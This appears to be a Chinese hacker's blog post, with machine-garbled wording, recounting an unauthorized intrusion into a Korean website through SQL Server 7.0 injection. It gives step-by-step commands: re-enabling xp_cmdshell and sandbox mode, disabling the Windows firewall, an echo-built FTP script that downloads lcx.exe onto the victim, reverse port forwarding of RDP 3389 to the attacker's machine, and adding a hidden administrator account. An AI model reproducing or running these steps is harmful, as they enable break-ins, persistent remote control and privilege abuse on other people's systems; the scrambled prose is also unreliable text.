下午搞了一個站，存在sa注入點裂痕，，window 2000+iis5。

通過注入點信息，發(fā)明sqlserver版本為7.00，以前見過一次這個版本，不外沒有怎么深入研究，伴侶掃弱口令掃描到的，其時也提權(quán)了，詳細健忘怎么提的了。附圖。

。

掃描這個ip地點發(fā)明只對外開放了53跟80，韓國的鳥站，由此揣摩大概為內(nèi)網(wǎng)可能外網(wǎng)可是限制了對外開放的端口。一般環(huán)境下會開啟1433，跟3389的可是限制對外毗連。

sqlserver7.0的固然以前搞過，可是健忘詳細怎么弄了，于是一步一步的先用穿山甲自帶的成果規(guī)復(fù)xp_cmdshell,sp_oa**,sp_***job,尚有一個sandboxmode沙盒模式。都開啟之后，隨便執(zhí)行set，ipconfig等呼吁發(fā)明沒有回顯，也不知道哪個組件可以呼吁。于是想到一個步伐。

此刻我本機執(zhí)行l(wèi)cx -listen 77 88通過77端口監(jiān)聽外部來的數(shù)據(jù)。然后在穿山甲里執(zhí)行net stop sharedaccess通過xp_cmdshell,然后sp_oa**,sp_***job,沙盒模式一一執(zhí)行，固然不知道樂成沒，可是假如可以執(zhí)行呼吁，必定可以樂成，目標是為了是對方呆板能對外發(fā)送數(shù)據(jù)。接著跟適才一樣執(zhí)行telnet 我的ip 22端口，最終發(fā)明通過沙盒模式可以執(zhí)行呼吁。

可是對方的3389不答允毗連，這時候想通過lcx端口轉(zhuǎn)發(fā)來毗連對方的3389，固然不確定是3389可是碰碰命運。

個中的ftp傳文件下載文件我親自測試過，就用這個了。

echo open www.ftp.com>ftp.TXT //毗連FTP
echo username>>ftp.TXT       //輸入用戶名
echo password>>ftp.TXT       //輸入暗碼
echo get lcx c:lcx.exe>>ftp.TXT //執(zhí)行下載呼吁
echo bye>>ftp.TXT             //退出
ftp -s:ftp.txt                //執(zhí)行FTP.TXT文件中的FTP呼吁
在穿山甲里依次執(zhí)行以下語句，假如沒有非凡環(huán)境。lcx就下載到對方呆板c盤目次下了。

然后通過沙河模式執(zhí)行c:/lcx.exe -slave 我的ip 77 127.0.0.1 3389

本機執(zhí)行l(wèi)cx -listen 77 88。

過了一小會發(fā)明有數(shù)據(jù)返回，證明lcx已經(jīng)傳上去了，而且將對方3389端口轉(zhuǎn)發(fā)到本機上了。

本機再毗連127.0.0.1:88，可以毗連上終端，然后在穿山甲執(zhí)行添加用戶的呼吁net user user password /add

net localgroup administrators user /add毗連終端，樂成登岸。如圖。

中間碰著一些問題就不說了。有什么疑問的可以提出來。